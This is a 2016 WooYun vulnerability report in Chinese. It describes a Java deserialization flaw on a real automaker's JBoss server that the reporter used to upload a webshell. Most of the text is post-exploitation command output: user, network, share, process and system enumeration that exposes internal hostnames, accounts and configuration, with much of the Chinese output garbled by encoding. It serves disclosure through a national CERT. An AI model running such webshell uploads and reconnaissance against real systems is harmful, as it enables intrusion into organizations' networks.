当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2016-0167127

漏洞标题:东风裕隆汽车有限公司某平台存在“Java 反序列化”漏洞,并getshell

相关厂商:cncert国家互联网应急中心

漏洞作者: 朱元璋

提交时间:2016-01-05 17:52

修复时间:2016-02-22 17:50

公开时间:2016-02-22 17:50

漏洞类型:系统/服务补丁不及时

危害等级:高

自评Rank:15

漏洞状态:已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2016-01-05: 细节已通知厂商并且等待厂商处理中
2016-01-08: 厂商已经确认,细节仅向厂商公开
2016-01-18: 细节向核心白帽子及相关领域专家公开
2016-01-28: 细节向普通白帽子公开
2016-02-07: 细节向实习白帽子公开
2016-02-22: 细节向公众公开

简要描述:

东风汽车公司是中国四大汽车集团之一,中国品牌500强,总部位于华中地区最大城市武汉,其前身是1969年始建于湖北十堰的“第二汽车制造厂”,经过四十多年的建设,已陆续建成了十堰(主要以中、重型商用车、零部件、汽车装备事业为主)、襄阳(以轻型商用车、乘用车为主)、武汉(以乘用车为主)、广州(以乘用车为主)四大基地。除此之外,还在上海、广西柳州、江苏盐城、四川南充、河南郑州、新疆乌鲁木齐、辽宁朝阳、浙江杭州、云南昆明等地设有分支企业。
公司名称 东风汽车公司 外文名称 Dongfeng Motor Corporation 总部地点 湖北武汉 成立时间 1969年 经营范围 商乘用车及零部件 公司性质国有企业 年营业额 4000亿元(2011年) 员工数 12.4万人 法人代表竺延风 公司简称 东风集团

详细说明:

0.png


地址http://**.**.**.**/存在“Java 反序列化”漏洞

00.png

01.png


直接上传木马到服务器中

02.png


漏洞证明:

D:\WEBAPP\jboss-4.2.3.GA\server\default\.\deploy\jmx-console.war\jmx-console>whoami
============================================================================================================r
dyeps02\epslocal
D:\WEBAPP\jboss-4.2.3.GA\server\default\.\deploy\jmx-console.war\jmx-console>net view
============================================================================================================r
���������� ע��
-------------------------------------------------------------------------------
\\CWSERVER
\\DAGSHARE
\\DHCPSRV01
\\DYACS01
\\DYACSS01
\\DYACSS02
\\DYADSRV1
\\DYADSRV2
\\DYADSRV3
\\DYAUTOCADS01
\\DYCADS01
\\DYCRDS01
\\DYDBMONS01
\\DYDHCPS01
\\DYDTMS01
\\DYDYOPS01
\\DYEIPAPS01
\\DYEIPDBS01
\\DYENCDB01
\\DYENCS01
\\DYENCS02
\\DYEPS01
\\DYEPS01TEST
\\DYEPS02
\\DYEPS02TEST
\\DYEPS03
\\DYEPS03TEST
\\DYEPS04TEST
\\DYEPS05TEST
\\DYESRS01
\\DYFTPS01
\\DYGISOPS01
\\DYGYSAPS01
\\DYHCSRV1
\\DYHCSRV2
\\DYHYJJS01
\\DYITFILES01
\\DYKMS01
\\DYMBXSRV1
\\DYMBXSRV2
\\DYMRPP01
\\DYOPS02
\\DYPOSSTEST01
\\DYPOSSTEST02
\\DYPOSSTEST03
\\DYPRINTERX64
\\DYQ2DBS01
\\DYSAPFS01
\\DYSDMS01
\\DYSDS01
\\DYSHPS01
\\DYSQLBITS01
\\DYTMSS01
\\DYTMSS02
\\DYUSBS01
\\DYYFFS01
\\EIPTEST-MOSS
\\EIPTEST-SQL
\\LGADSS01
\\LGFISS01
\\LGXFTS01
����ɹ���ɡ�
D:\WEBAPP\jboss-4.2.3.GA\server\default\.\deploy\jmx-console.war\jmx-console>net share
============================================================================================================r
������ ��Դ ע��
-------------------------------------------------------------------------------
C$ C:\ Ĭ�Ϲ���
D$ D:\ Ĭ�Ϲ���
IPC$ Զ�� IPC
ADMIN$ C:\Windows Զ�̹���
Tools D:\Tools
����ɹ���ɡ�
D:\WEBAPP\jboss-4.2.3.GA\server\default\.\deploy\jmx-console.war\jmx-console>net user
============================================================================================================r
\\DYEPS02 ���û��ʻ�
-------------------------------------------------------------------------------
Administrator EPSLOCAL Guest
����ɹ���ɡ�
D:\WEBAPP\jboss-4.2.3.GA\server\default\.\deploy\jmx-console.war\jmx-console>net start
============================================================================================================r
�Ѿ�������� Windows ����:
Application Information
Application Management
Backup Agent
Base Filtering Engine
Certificate Propagation
CNG Key Isolation
COM+ Event System
COM+ System Application
Cryptographic Services
DCOM Server Process Launcher
Desktop Window Manager Session Manager
DHCP Client
Diagnostic Policy Service
Distributed Link Tracking Client
Distributed Transaction Coordinator
DNS Client
ESET Service
Function Discovery Provider Host
Group Policy Client
IKE and AuthIP IPsec Keying Modules
IP Helper
IPsec Policy Agent
Netlogon
Network Connections
Network List Service
Network Location Awareness
Network Store Interface Service
Plug and Play
Power
Print Spooler
Remote Desktop Configuration
Remote Desktop Services
Remote Desktop Services UserMode Port Redirector
Remote Procedure Call (RPC)
Remote Registry
RPC Endpoint Mapper
Security Accounts Manager
Server
Shell Hardware Detection
Software Protection
System Event Notification Service
Task Scheduler
TCP/IP NetBIOS Helper
User Profile Service
VMware Tools Service
VMware ��������
Windows Event Log
Windows Firewall
Windows Font Cache Service
Windows Management Instrumentation
Windows Remote Management (WS-Management)
Windows Time
Windows Update
Workstation
wudfsc Config Setting Service
����ɹ���ɡ�
D:\WEBAPP\jboss-4.2.3.GA\server\default\.\deploy\jmx-console.war\jmx-console>netstat -ano
============================================================================================================r
�����
Э�� ���ص�ַ �ⲿ��ַ ״̬ PID
TCP **.**.**.**:80 **.**.**.**:0 LISTENING 9488
TCP **.**.**.**:135 **.**.**.**:0 LISTENING 680
TCP **.**.**.**:445 **.**.**.**:0 LISTENING 4
TCP **.**.**.**:1098 **.**.**.**:0 LISTENING 9488
TCP **.**.**.**:1099 **.**.**.**:0 LISTENING 9488
TCP **.**.**.**:1688 **.**.**.**:0 LISTENING 748
TCP **.**.**.**:3389 **.**.**.**:0 LISTENING 1944
TCP **.**.**.**:3873 **.**.**.**:0 LISTENING 9488
TCP **.**.**.**:4444 **.**.**.**:0 LISTENING 9488
TCP **.**.**.**:4445 **.**.**.**:0 LISTENING 9488
TCP **.**.**.**:4446 **.**.**.**:0 LISTENING 9488
TCP **.**.**.**:8009 **.**.**.**:0 LISTENING 9488
TCP **.**.**.**:8083 **.**.**.**:0 LISTENING 9488
TCP **.**.**.**:8093 **.**.**.**:0 LISTENING 9488
TCP **.**.**.**:28002 **.**.**.**:0 LISTENING 1912
TCP **.**.**.**:47001 **.**.**.**:0 LISTENING 4
TCP **.**.**.**:49152 **.**.**.**:0 LISTENING 396
TCP **.**.**.**:49153 **.**.**.**:0 LISTENING 764
TCP **.**.**.**:49154 **.**.**.**:0 LISTENING 816
TCP **.**.**.**:49176 **.**.**.**:0 LISTENING 500
TCP **.**.**.**:49177 **.**.**.**:0 LISTENING 492
TCP **.**.**.**:49178 **.**.**.**:0 LISTENING 1988
TCP **.**.**.**:49182 **.**.**.**:0 LISTENING 1976
TCP **.**.**.**:61325 **.**.**.**:0 LISTENING 9488
TCP **.**.**.**:61326 **.**.**.**:0 LISTENING 9488
TCP **.**.**.**:61328 **.**.**.**:0 LISTENING 9488
TCP **.**.**.**:61330 **.**.**.**:0 LISTENING 9488
TCP **.**.**.**:80 **.**.**.**:4271 CLOSE_WAIT 5896
TCP **.**.**.**:80 **.**.**.**:5504 CLOSE_WAIT 5896
TCP **.**.**.**:80 **.**.**.**:15946 CLOSE_WAIT 5896
TCP **.**.**.**:80 **.**.**.**:4022 ESTABLISHED 9488
TCP **.**.**.**:80 **.**.**.**:4043 FIN_WAIT_2 9488
TCP **.**.**.**:80 **.**.**.**:4045 ESTABLISHED 9488
TCP **.**.**.**:139 **.**.**.**:0 LISTENING 4
TCP **.**.**.**:49348 **.**.**.**:80 ESTABLISHED 5276
TCP **.**.**.**:50359 **.**.**.**:80 ESTABLISHED 25784
TCP **.**.**.**:50475 **.**.**.**:80 ESTABLISHED 30204
TCP **.**.**.**:56536 **.**.**.**:80 ESTABLISHED 10672
TCP **.**.**.**:59063 **.**.**.**:80 ESTABLISHED 4752
TCP **.**.**.**:60986 **.**.**.**:80 ESTABLISHED 2360
TCP **.**.**.**:61331 **.**.**.**:1433 ESTABLISHED 9488
TCP **.**.**.**:61332 **.**.**.**:1433 ESTABLISHED 9488
TCP **.**.**.**:61333 **.**.**.**:1433 ESTABLISHED 9488
TCP **.**.**.**:61334 **.**.**.**:1433 ESTABLISHED 9488
TCP **.**.**.**:61335 **.**.**.**:1433 ESTABLISHED 9488
TCP **.**.**.**:61336 **.**.**.**:1433 ESTABLISHED 9488
TCP **.**.**.**:61339 **.**.**.**:1433 ESTABLISHED 9488
TCP **.**.**.**:61340 **.**.**.**:1433 ESTABLISHED 9488
TCP **.**.**.**:61876 **.**.**.**:80 CLOSE_WAIT 2360
TCP **.**.**.**:62750 **.**.**.**:80 ESTABLISHED 2900
TCP **.**.**.**:64781 **.**.**.**:80 ESTABLISHED 30252
TCP **.**.**.**:51317 **.**.**.**:0 LISTENING 1912
TCP **.**.**.**:139 **.**.**.**:0 LISTENING 4
TCP **.**.**.**:8093 **.**.**.**:59634 ESTABLISHED 9488
TCP **.**.**.**:8093 **.**.**.**:61406 ESTABLISHED 9488
TCP **.**.**.**:8093 **.**.**.**:61407 ESTABLISHED 9488
TCP **.**.**.**:8093 **.**.**.**:61409 ESTABLISHED 9488
TCP **.**.**.**:8093 **.**.**.**:61411 ESTABLISHED 9488
TCP **.**.**.**:8093 **.**.**.**:61412 ESTABLISHED 9488
TCP **.**.**.**:8093 **.**.**.**:61413 ESTABLISHED 9488
TCP **.**.**.**:8093 **.**.**.**:61414 ESTABLISHED 9488
TCP **.**.**.**:8093 **.**.**.**:61415 ESTABLISHED 9488
TCP **.**.**.**:8093 **.**.**.**:61417 ESTABLISHED 9488
TCP **.**.**.**:8093 **.**.**.**:61419 ESTABLISHED 9488
TCP **.**.**.**:8093 **.**.**.**:61420 ESTABLISHED 9488
TCP **.**.**.**:8093 **.**.**.**:61425 ESTABLISHED 9488
TCP **.**.**.**:8093 **.**.**.**:61520 ESTABLISHED 9488
TCP **.**.**.**:8093 **.**.**.**:64197 ESTABLISHED 9488
TCP **.**.**.**:59634 **.**.**.**:8093 ESTABLISHED 9488
TCP **.**.**.**:61406 **.**.**.**:8093 ESTABLISHED 9488
TCP **.**.**.**:61407 **.**.**.**:8093 ESTABLISHED 9488
TCP **.**.**.**:61409 **.**.**.**:8093 ESTABLISHED 9488
TCP **.**.**.**:61411 **.**.**.**:8093 ESTABLISHED 9488
TCP **.**.**.**:61412 **.**.**.**:8093 ESTABLISHED 9488
TCP **.**.**.**:61413 **.**.**.**:8093 ESTABLISHED 9488
TCP **.**.**.**:61414 **.**.**.**:8093 ESTABLISHED 9488
TCP **.**.**.**:61415 **.**.**.**:8093 ESTABLISHED 9488
TCP **.**.**.**:61417 **.**.**.**:8093 ESTABLISHED 9488
TCP **.**.**.**:61419 **.**.**.**:8093 ESTABLISHED 9488
TCP **.**.**.**:61420 **.**.**.**:8093 ESTABLISHED 9488
TCP **.**.**.**:61425 **.**.**.**:8093 ESTABLISHED 9488
TCP **.**.**.**:61520 **.**.**.**:8093 ESTABLISHED 9488
TCP **.**.**.**:64197 **.**.**.**:8093 ESTABLISHED 9488
TCP [::]:80 [::]:0 LISTENING 9488
TCP [::]:135 [::]:0 LISTENING 680
TCP [::]:445 [::]:0 LISTENING 4
TCP [::]:1098 [::]:0 LISTENING 9488
TCP [::]:1099 [::]:0 LISTENING 9488
TCP [::]:1688 [::]:0 LISTENING 748
TCP [::]:3389 [::]:0 LISTENING 1944
TCP [::]:3873 [::]:0 LISTENING 9488
TCP [::]:4444 [::]:0 LISTENING 9488
TCP [::]:4445 [::]:0 LISTENING 9488
TCP [::]:4446 [::]:0 LISTENING 9488
TCP [::]:8009 [::]:0 LISTENING 9488
TCP [::]:8083 [::]:0 LISTENING 9488
TCP [::]:8093 [::]:0 LISTENING 9488
TCP [::]:28002 [::]:0 LISTENING 1912
TCP [::]:47001 [::]:0 LISTENING 4
TCP [::]:49152 [::]:0 LISTENING 396
TCP [::]:49153 [::]:0 LISTENING 764
TCP [::]:49154 [::]:0 LISTENING 816
TCP [::]:49176 [::]:0 LISTENING 500
TCP [::]:49177 [::]:0 LISTENING 492
TCP [::]:49178 [::]:0 LISTENING 1988
TCP [::]:49182 [::]:0 LISTENING 1976
TCP [::]:61325 [::]:0 LISTENING 9488
TCP [::]:61326 [::]:0 LISTENING 9488
TCP [::]:61328 [::]:0 LISTENING 9488
TCP [::]:61330 [::]:0 LISTENING 9488
UDP **.**.**.**:123 *:* 884
UDP **.**.**.**:500 *:* 816
UDP **.**.**.**:4500 *:* 816
UDP **.**.**.**:5355 *:* 968
UDP **.**.**.**:137 *:* 4
UDP **.**.**.**:138 *:* 4
UDP **.**.**.**:54467 *:* 816
UDP **.**.**.**:54646 *:* 968
UDP **.**.**.**:54647 *:* 500
UDP **.**.**.**:55724 *:* 3820
UDP **.**.**.**:59908 *:* 3120
UDP **.**.**.**:137 *:* 4
UDP **.**.**.**:138 *:* 4
UDP [::]:123 *:* 884
UDP [::]:500 *:* 816
UDP [::]:4500 *:* 816
UDP [::]:5355 *:* 968
UDP [fe80::7c22:69:754b:51f5%12]:546 *:* 764
D:\WEBAPP\jboss-4.2.3.GA\server\default\.\deploy\jmx-console.war\jmx-console>tasklist /svc
============================================================================================================r
ӳ������ PID ����
========================= ======== ============================================
System Idle Process 0 ��ȱ
System 4 ��ȱ
smss.exe 256 ��ȱ
csrss.exe 356 ��ȱ
wininit.exe 396 ��ȱ
csrss.exe 404 ��ȱ
winlogon.exe 432 ��ȱ
services.exe 492 ��ȱ
lsass.exe 500 KeyIso, Netlogon, SamSs
lsm.exe 508 ��ȱ
svchost.exe 600 DcomLaunch, PlugPlay, Power
svchost.exe 680 RpcEptMapper, RpcSs
LogonUI.exe 756 ��ȱ
svchost.exe 764 Dhcp, eventlog, lmhosts
svchost.exe 816 Appinfo, AppMgmt, CertPropSvc, gpsvc,
IKEEXT, iphlpsvc, LanmanServer, ProfSvc,
Schedule, SENS, SessionEnv,
ShellHWDetection, Winmgmt, wuauserv
svchost.exe 884 EventSystem, fdPHost, netprofm, nsi, W32Tim
svchost.exe 924 Netman, TrkWks, UmRdpService, UxSms
svchost.exe 968 CryptSvc, Dnscache, LanmanWorkstation,
NlaSvc, WinRM
svchost.exe 272 BFE, DPS, MpsSvc
spoolsv.exe 1052 Spooler
ekrn.exe 1148 ekrn
svchost.exe 1216 RemoteRegistry
vmtoolsd.exe 1308 VMTools
VMUpgradeHelper.exe 1356 VMUpgradeHelper
svchost.exe 1944 TermService
svchost.exe 1988 PolicyAgent
msdtc.exe 1976 MSDTC
csrss.exe 2204 ��ȱ
winlogon.exe 2228 ��ȱ
taskhost.exe 2788 ��ȱ
rdpclip.exe 2884 ��ȱ
dwm.exe 2956 ��ȱ
explorer.exe 2972 ��ȱ
egui.exe 1592 ��ȱ
svchost.exe 1892 FontCache
sppsvc.exe 748 sppsvc
csrss.exe 4060 ��ȱ
winlogon.exe 3632 ��ȱ
taskhost.exe 3872 ��ȱ
rdpclip.exe 2664 ��ȱ
dwm.exe 3636 ��ȱ
explorer.exe 1396 ��ȱ
VMwareTray.exe 2872 ��ȱ
egui.exe 3568 ��ȱ
jusched.exe 3416 ��ȱ
Oobe.exe 1412 ��ȱ
cmd.exe 3476 ��ȱ
conhost.exe 2188 ��ȱ
avagent.exe 1912 avbackup
upnpshots.exe 3120 ��ȱ
upnpshots.exe 3820 ��ȱ
cmd.exe 5924 ��ȱ
conhost.exe 5856 ��ȱ
javaw.exe 2360 ��ȱ
cmd.exe 4564 ��ȱ
conhost.exe 4040 ��ȱ
javaw.exe 2900 ��ȱ
cmd.exe 5048 ��ȱ
conhost.exe 2808 ��ȱ
javaw.exe 5276 ��ȱ
cmd.exe 4548 ��ȱ
conhost.exe 2424 ��ȱ
javaw.exe 4752 ��ȱ
cmd.exe 13696 ��ȱ
conhost.exe 26944 ��ȱ
javaw.exe 30204 ��ȱ
cmd.exe 15264 ��ȱ
conhost.exe 8992 ��ȱ
javaw.exe 25784 ��ȱ
cmd.exe 26936 ��ȱ
conhost.exe 24340 ��ȱ
javaw.exe 10672 ��ȱ
cmd.exe 22532 ��ȱ
conhost.exe 20620 ��ȱ
javaw.exe 30252 ��ȱ
WmiPrvSE.exe 28788 ��ȱ
svchost.exe 24612 wudfsvccfg
java.exe 9488 ��ȱ
dllhost.exe 13528 COMSysApp
findstr.exe 30096 ��ȱ
conhost.exe 4052 ��ȱ
tasklist.exe 25544 ��ȱ
conhost.exe 30984 ��ȱ
WmiPrvSE.exe 6648 ��ȱ
D:\WEBAPP\jboss-4.2.3.GA\server\default\.\deploy\jmx-console.war\jmx-console>ipconfig /all
============================================================================================================r
Windows IP ����
������ . . . . . . . . . . . . . : DYEPS02
�� DNS ��׺ . . . . . . . . . . . : LUXGEN.**.**.**.**
�ڵ����� . . . . . . . . . . . . : ���
IP ·�������� . . . . . . . . . . : ��
WINS ���������� . . . . . . . . . : ��
DNS ��׺�����б� . . . . . . . . : LUXGEN.**.**.**.**
dfyl.**.**.**.**
��̫�������� �������� 2:
�����ض��� DNS ��׺ . . . . . . . :
����. . . . . . . . . . . . . . . : Intel(R) PRO/1000 MT Network Connection #2
�����ַ. . . . . . . . . . . . . : 00-50-56-B3-53-71
DHCP ������ . . . . . . . . . . . : ��
�Զ�����������. . . . . . . . . . : ��
�������� IPv6 ��ַ. . . . . . . . : fe80::7c22:69:754b:51f5%12(��ѡ)
�Զ����� IPv4 ��ַ . . . . . . . : **.**.**.**(��ѡ)
�������� . . . . . . . . . . . . : **.**.**.**
Ĭ������. . . . . . . . . . . . . :
DHCPv6 IAID . . . . . . . . . . . : 302010454
DHCPv6 �ͻ��� DUID . . . . . . . : 00-01-00-01-1A-BA-54-6B-00-50-56-B3-39-14
DNS ������ . . . . . . . . . . . : fec0:0:0:ffff::1%1
fec0:0:0:ffff::2%1
fec0:0:0:ffff::3%1
TCPIP �ϵ� NetBIOS . . . . . . . : ������
��̫�������� ��������:
�����ض��� DNS ��׺ . . . . . . . : dfyl.**.**.**.**
����. . . . . . . . . . . . . . . : Intel(R) PRO/1000 MT Network Connection
�����ַ. . . . . . . . . . . . . : 00-50-56-B3-39-14
DHCP ������ . . . . . . . . . . . : ��
�Զ�����������. . . . . . . . . . : ��
�������� IPv6 ��ַ. . . . . . . . : fe80::51bc:e41e:1aa6:d9f9%11(��ѡ)
IPv4 ��ַ . . . . . . . . . . . . : **.**.**.**(��ѡ)
�������� . . . . . . . . . . . . : **.**.**.**
Ĭ������. . . . . . . . . . . . . : **.**.**.**
DHCPv6 IAID . . . . . . . . . . . : 234901590
DHCPv6 �ͻ��� DUID . . . . . . . : 00-01-00-01-1A-BA-54-6B-00-50-56-B3-39-14
DNS ������ . . . . . . . . . . . : **.**.**.**
TCPIP �ϵ� NetBIOS . . . . . . . : ������
��������� isatap.dfyl.**.**.**.**:
ý��״̬ . . . . . . . . . . . . : ý���ѶϿ�
�����ض��� DNS ��׺ . . . . . . . : dfyl.**.**.**.**
����. . . . . . . . . . . . . . . : Microsoft ISATAP Adapter
�����ַ. . . . . . . . . . . . . : 00-00-00-00-00-00-00-E0
DHCP ������ . . . . . . . . . . . : ��
�Զ�����������. . . . . . . . . . : ��
��������� isatap.{997A12F7-AA43-412C-9C89-0910AC36A0F9}:
ý��״̬ . . . . . . . . . . . . : ý���ѶϿ�
�����ض��� DNS ��׺ . . . . . . . :
����. . . . . . . . . . . . . . . : Microsoft ISATAP Adapter #2
�����ַ. . . . . . . . . . . . . : 00-00-00-00-00-00-00-E0
DHCP ������ . . . . . . . . . . . : ��
�Զ�����������. . . . . . . . . . : ��
D:\WEBAPP\jboss-4.2.3.GA\server\default\.\deploy\jmx-console.war\jmx-console>query user
============================================================================================================r
�û��� �Ự�� ID ״̬ ����ʱ�� ��¼ʱ��
>epslocal 2 �Ͽ� 5+10:56 2015/2/27 21:17
epsadmin 3 �Ͽ� 70+13:32 2015/2/28 10:09
D:\WEBAPP\jboss-4.2.3.GA\server\default\.\deploy\jmx-console.war\jmx-console>systeminfo
============================================================================================================r
������: DYEPS02
OS ����: Microsoft Windows Server 2008 R2 Standard
OS �汾: 6.1.7601 Service Pack 1 Build 7601
OS ������: Microsoft Corporation
OS ����: ��Ա������
OS ��������: Multiprocessor Free
ע���������: DYCMSS01\hpadmin
ע�����֯: HP IO Provisioned Server
��Ʒ ID: 55041-314-1820064-84295
��ʼ��װ����: 2014/3/19, 3:20:41
ϵͳ���ʱ��: 2015/2/27, 21:15:06
ϵͳ������: VMware, Inc.
ϵͳ�ͺ�: VMware Virtual Platform
ϵͳ����: x64-based PC
������: ��װ�� 2 ����������
[01]: AMD64 Family 16 Model 2 Stepping 3 AuthenticAMD ~2200 Mhz
[02]: AMD64 Family 16 Model 2 Stepping 3 AuthenticAMD ~2200 Mhz
BIOS �汾: Phoenix Technologies LTD 6.00, 2013/8/16
Windows Ŀ¼: C:\Windows
ϵͳĿ¼: C:\Windows\system32
����豸: \Device\HarddiskVolume1
ϵͳ��������: zh-cn;����(�й�)
���뷨��������: zh-cn;����(�й�)
ʱ��: (UTC+08:00)���������죬����ر�����������³ľ��
�����ڴ�����: 16,383 MB
���õ������ڴ�: 12,583 MB
�����ڴ�: ���ֵ: 32,765 MB
�����ڴ�: ����: 26,037 MB
�����ڴ�: ʹ����: 6,728 MB
ҳ���ļ�λ��: C:\pagefile.sys
��: LUXGEN.**.**.**.**
��¼������: \\DYEPS02
�޲�����: ��װ�� 1 ���޲�����
[01]: KB976902
����: ��װ�� 2 �� NIC��
[01]: Intel(R) PRO/1000 MT Network Connection
������: ��������
���� DHCP: ��
IP ��ַ
[01]: **.**.**.**
[02]: fe80::51bc:e41e:1aa6:d9f9
[02]: Intel(R) PRO/1000 MT Network Connection
������: �������� 2
���� DHCP: ��
DHCP ������: **.**.**.**
IP ��ַ
[01]: **.**.**.**
[02]: fe80::7c22:69:754b:51f5
D:\WEBAPP\jboss-4.2.3.GA\server\default\.\deploy\jmx-console.war\jmx-console>

修复方案:

加强安全意识

版权声明:转载请注明来源 朱元璋@乌云


漏洞回应

厂商回应:

危害等级:中

漏洞Rank:9

确认时间:2016-01-08 21:45

厂商回复:

CNVD确认所述漏洞情况,暂未建立与网站管理单位的直接处置渠道,待认领。

最新状态:

暂无


漏洞评价:

评价